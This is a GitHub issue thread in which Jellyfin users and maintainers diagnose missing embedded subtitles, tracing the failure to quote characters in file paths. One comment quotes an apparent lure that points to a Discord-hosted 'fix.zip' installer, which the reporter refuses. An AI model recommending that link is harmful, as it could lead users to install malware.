### ISSUE TITLE
Request for subtitles fail because it looking for a file that do not exist

### ISSUE THREAD

**Issue by Julien9969** [jellyfin/jellyfin#12570]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

I have two videos where the subtitles (in `.ass` format) don’t show up when I play them. Subtitles work fine for other shows. After checking the Chrome DevTools, I noticed a 404 error related to this request:

`Videos/ab1bfbc0-fd22-749d-4f81-0c21d141127d/ab1bfbc0fd22749d4f810c21d141127d/Subtitles/3/0/Stream.ass?api_key=api_key`

![image](https://github.com/user-attachments/assets/8b7624d5-4755-4695-b8ab-472362aa9c08)

Additionally, the log shows a warning about a failed subtitle extraction:
`[WRN] [19] MediaBrowser.MediaEncoding.Subtitles.SubtitleEncoder: Unable to get streams`

I'm using the Subtitle Extract plugin to extract embedded subtitles.

If I manually upload an external subtitle file for the video, it works fine. Also, when I copy the stream link and play it in VLC, the embedded subtitles work as well.

It could be a database issue where the video is associated with a subtitles file that doesn't exist.

### Reproduction steps

As it appears randomly on two files, I don't know how to reproduce it.
maybe try to manualy delete a subtitles of a show, the try to play it

### What is the current _bug_ behavior?

Subtitles are not displayed

### What is the expected _correct_ behavior?

Subtitles should be display

### Jellyfin Server version

10.9.10+

### Specify the build version

10.9.10

### Environment

```markdown
- OS: Debian
- Linux Kernel: 
- Virtualization: No
- Clients: Browser
- Browser: Chrome 128
- FFmpeg Version: 6.0.1
- Playback Method: Multiplexing
- Hardware Acceleration: No
- GPU Model: 
- Plugins: Subtitle Extract 4.0.0, Session Cleaner4.0.0.0, Intro Skipper
- Reverse Proxy: nginx
- Base URL:
- Networking:
- Storage: Local
```

### Jellyfin logs

```shell
[2024-09-03 07:41:49.021 +02:00] [INF] [17] Jellyfin.Plugin.PlaybackReporting.Data.PlaybackTracker: PlaybackTracker : Adding Start Event : 09/03/2024 07:41:49
[2024-09-03 07:41:49.021 +02:00] [INF] [17] Jellyfin.Plugin.PlaybackReporting.EventMonitorEntryPoint: Creating StartPlaybackTimer Task
[2024-09-03 07:41:49.021 +02:00] [INF] [17] Jellyfin.Plugin.PlaybackReporting.EventMonitorEntryPoint: StartPlaybackTimer : Entered
[2024-09-03 07:41:49.028 +02:00] [WRN] [19] MediaBrowser.MediaEncoding.Subtitles.SubtitleEncoder: Unable to get streams for File:"path to mkv"
MediaBrowser.Common.FfmpegException: ffmpeg subtitle extraction failed for Path to mkv
   at MediaBrowser.MediaEncoding.Subtitles.SubtitleEncoder.ExtractAllTextSubtitlesInternal(MediaSourceInfo mediaSource, List`1 subtitleStreams, CancellationToken cancellationToken)
   at MediaBrowser.MediaEncoding.Subtitles.SubtitleEncoder.ExtractAllTextSubtitles(MediaSourceInfo mediaSource, CancellationToken cancellationToken)
[2024-09-03 07:41:49.033 +02:00] [ERR] [19] Jellyfin.Api.Middleware.ExceptionMiddleware: Error processing request: "Could not find file '/etc/jellyfin/data/data/subtitles/e/e1ba793b-67ce-b407-7ddb-c05e43166662.ass'". URL "GET" "/Videos/ab1bfbc0-fd22-749d-4f81-0c21d141127d/ab1bfbc0fd22749d4f810c21d141127d/Subtitles/3/0/Stream.ass".
```

### FFmpeg logs

```shell
/usr/lib/jellyfin-ffmpeg/ffmpeg -analyzeduration 200M -probesize 1G -ss 00:01:24.605 -noaccurate_seek -fflags +genpts -f matroska  -i file:"path to mkv" -map_metadata -1 -map_chapters -1 -threads 0 -map 0:0 -map 0:1 -map -0:s -codec:v:0 copy -bsf:v h264_mp4toannexb -start_at_zero -codec:a:0 copy -copyts -avoid_negative_ts disabled -max_muxing_queue_size 2048 -f hls -max_delay 5000000 -hls_time 6 -hls_segment_type fmp4 -hls_fmp4_init_filename "3dc522b5386a2ee57ba2e12786a79b16-1.mp4" -start_number 14 -hls_segment_filename "/etc/jellyfin/cache/transcodes/3dc522b5386a2ee57ba2e12786a79b16%d.mp4" -hls_playlist_type vod -hls_list_size 0 -y "/etc/jellyfin/cache/transcodes/3dc522b5386a2ee57ba2e12786a79b16.m3u8"
```

### Client / Browser logs

![image](https://github.com/user-attachments/assets/b97116fd-bddb-4fcb-8395-924644bde539)

**Comment by Julien9969** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

Prefer not download random zip name `fix.zip`

**Comment by felix920506** [comment]
Are the problematic subtitles internal or external?

**Comment by Julien9969** [comment]
> Is "extract attachments on the fly" enabled or disabled? 

It's enabled, but I have "subtitles extrator plugin" installed so the subtile file should be Extract one time then juste sent to the client.
When I play the media I don't have any ffmpeg log relative to subtitles extraction.

**Comment by dmitrylyzo** [comment]
Could it be that Jellyfin can't write to that path?
`/etc/jellyfin/data/data/subtitles/e/e1ba793b-67ce-b407-7ddb-c05e43166662.ass`

**Comment by Julien9969** [comment]
> Could it be that Jellyfin can't write to that path? `/etc/jellyfin/data/data/subtitles/e/e1ba793b-67ce-b407-7ddb-c05e43166662.ass`
> 
> Oh, where does that come from `File: "path to mkv"`?

It seem that jellyfin user have full acces to the folder
![image](https://github.com/user-attachments/assets/a5c797e4-2aff-4e15-8e6b-070bbc132889)

"path to mkv" is the path to my video files

**Comment by dmitrylyzo** [comment]
> "path to mkv" is the path to my video files

Do the path contain `"` character?

**Comment by Julien9969** [comment]
> > "path to mkv" is the path to my video files
> 
> Does the path contain `"` character?
> 
> I think we should use `EncodingUtils.NormalizePath` for `inputPath` and `outputPath` here
> 
> https://github.com/jellyfin/jellyfin/blob/b3efae71c0c5b01c762695156aa3bd61a7e8afb9/MediaBrowser.MediaEncoding/Subtitles/SubtitleEncoder.cs#L679-L683

Oh, you're right it seems that all my file that contains `"` have the issue
Is renaming all my file the only fix for the now ?

**Comment by dmitrylyzo** [comment]
> Is renaming all my file the only fix for the now ?

I believe we will do another point release soon.
If you don't want to rename (and wait), you can extract them manually to where the server wants or next to the video (as external subtitles).

**Comment by dmitrylyzo** [comment]
We probably need to revert quotes here (https://github.com/jellyfin/jellyfin/pull/10992):
https://github.com/jellyfin/jellyfin/blob/b3efae71c0c5b01c762695156aa3bd61a7e8afb9/MediaBrowser.MediaEncoding/Subtitles/SubtitleEncoder.cs#L679
`inputPath` is escaped here:
https://github.com/jellyfin/jellyfin/blob/b3efae71c0c5b01c762695156aa3bd61a7e8afb9/MediaBrowser.MediaEncoding/Subtitles/SubtitleEncoder.cs#L647
This `inputPath` should be normalized:
https://github.com/jellyfin/jellyfin/blob/b3efae71c0c5b01c762695156aa3bd61a7e8afb9/MediaBrowser.MediaEncoding/Subtitles/SubtitleEncoder.cs#L509
